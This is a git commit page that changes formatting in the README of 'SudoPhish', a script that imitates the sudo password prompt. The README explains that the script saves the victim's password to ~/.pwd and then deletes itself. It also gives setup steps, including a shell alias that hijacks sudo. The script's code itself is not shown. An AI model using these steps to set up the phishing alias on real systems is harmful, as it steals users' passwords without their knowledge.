SudoPhish

Unnamed repository; edit this file 'description' to name the repository.
Log | Files | Refs | README | LICENSE

commit affa4caaa6526abc044c1d4f54eecba4fa0bf180
parent 56f0e7a09c34f54b9712ab48b7dc8283217c2398
Author: MichaelDim02 <31562759+MichaelDim02@users.noreply.github.com>
Date:   Thu,  8 Jul 2021 08:38:16 +0000

Update README.md
Diffstat:
MREADME.md | 6+++---
1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/README.md b/README.md @@ -3,13 +3,13 @@ A short self-destructive script to phish the passwords of the users on your syst # What it does + It pretends to be the Sudo password prompt and asks the victim for their password -+ Saves the password in a text file ( ~/.pwd ) ++ Saves the password in a text file ( ```~/.pwd``` ) + Redirects the user to real sudo + Self-destructs # How to set up manually + Move everything to the home directory of the user if it isn't there already -+ Make sure you edit the shabang according to the users interactive SH. If they use bash, make sure the script starts with #!/bin/bash , if they use zsh, then make sure it starts with #!/bin/zsh etc. It does not work with fish. Default is bash. -+ Set the $shellfile variable accordingly (line 21). Default is .bashrc ++ Make sure you edit the shabang according to the users interactive SH. If they use bash, make sure the script starts with ```#!/bin/bash```, if they use zsh, then make sure it starts with ```#!/bin/zsh``` etc. It does not work with fish. Default is bash. ++ Set the ```$shellfile``` variable accordingly (line 21). Default is ```".bashrc"``` + Put the following line at the END of the Shell config file: ``` alias sudo=".sp.sh; sudo" ``` + Rename the file .sp.sh